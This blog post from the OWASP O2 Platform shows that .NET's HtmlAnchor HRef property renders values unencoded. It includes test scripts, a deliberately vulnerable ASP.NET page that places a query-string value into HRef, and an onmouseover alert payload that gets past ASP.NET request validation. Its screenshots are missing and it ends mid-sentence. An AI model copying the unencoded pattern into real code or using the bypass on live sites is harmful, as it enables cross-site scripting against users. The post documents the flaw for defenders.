OWASP O2 Platform Blog

Checking if .NET’s HtmlAnchor Href property is vulnerable to XSS

I was reviewing an app’s code and it looked like there was an XSS injection vector into the .NET’s built in HtmlAnchor Href property.

To make sure this happened, I quickly wrote the following script which allowed me to confirm that YES that property is vulnerable to XSS:

var stringWriter = new System.IO.StringWriter();
var htmlTextWriter  =  new HtmlTextWriter(stringWriter);
var htmlAnchor = new System.Web.UI.HtmlControls.HtmlAnchor();
htmlAnchor.Title ="title";
htmlAnchor.HRef ="sadfasdf'<>\">aaa";

htmlAnchor.RenderControl(htmlTextWriter); 
//htmlAnchor.details();
return stringWriter.str();
//using System.Web.UI;

On the screenshot below you can see that none of the chars were encoded:

So the result in the ‘Output’ window shows the value put on the htmlAnchor.HRef ( the payload “sadfasdf'<>\”>aaa”), it is not encoded.

To really test this, lets try it on web page.

This next script will put the payload on an IE object:

var topPanel = panel.clear().add_Panel();
var ie = topPanel.add_IE().silent(true);
var stringWriter = new System.IO.StringWriter();
var htmlTextWriter  =  new HtmlTextWriter(stringWriter);

var htmlAnchor = new System.Web.UI.HtmlControls.HtmlAnchor();

htmlAnchor.Title ="title";
htmlAnchor.HRef ="<a href="http://www.google.com'%3c%3e/%22%3Eaaa">http://www.google.com'<>\">aaa</a>";

htmlAnchor.RenderControl(htmlTextWriter); 
 
ie.open("about:blank");
var html = "<html><body><h1>XSS on HtmlAnchor Href tag</h1>" +
           "before anchor<br/>" +
           stringWriter.str() +
           "<br/>after anchor</body></html>";
ie.html(html); 

//using System.Web.UI;
//using O2.XRules.Database.Utils.O2
//O2File:WatiN_IE_ExtensionMethods.cs
//O2Ref:WatiN.Core.1x.dll
//O2Ref:Microsoft.mshtml.dll

which looks like this:

Note how the payload in the html achor breaks the html element and is shown on the page.

To really check if this is a problem let try this on a real ASP.NET page .

For that, open the Util – Aspx PoC Builder.h2 script ,which you can find here:

… and looks like this when opened:

This control will fire up a local webserver on (the directory specified on the left) and will give us a quick way to write ASP.NET Pocs

For this example lets create file called AnchorTag.aspx in an ASP.NET Controls folder

… and use the content from http://www.w3schools.com/aspnet/showasp.asp?filename=demo_htmlanchor with a small modification: On line 4 add ?value=” + Request(“payload”) to the Href value (so that we can put a payload via the Querystring or POST request)

link1.HRef="<a href="http://www.w3schools.com/?value">http://www.w3schools.com/?value</a>=" + Request("payload")

This is what it looks like when executed:

We can now add a variable called payload to the QueryString :

… which if containing a and a > will break the Html Anchor Element

 

Since when we are inside Html attribute the   (and an =) is all we need to put in an XSS payload, we can popup an alert using  ” onmouseover=”alert(12)

Bypassing ASP.NET Validation

What is interresting (and dangerous) and this exploit vector is that it bypasses ASP.NET validation.

For example if we use a payload that has a valid Html tag (payload=“aaaa”> <h1>XSS</h1>) we will get this error:

November 6, 2011 - Posted by | .NET, ASP.NET Controls, IE Automation, Vulnerabilities, XSS

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: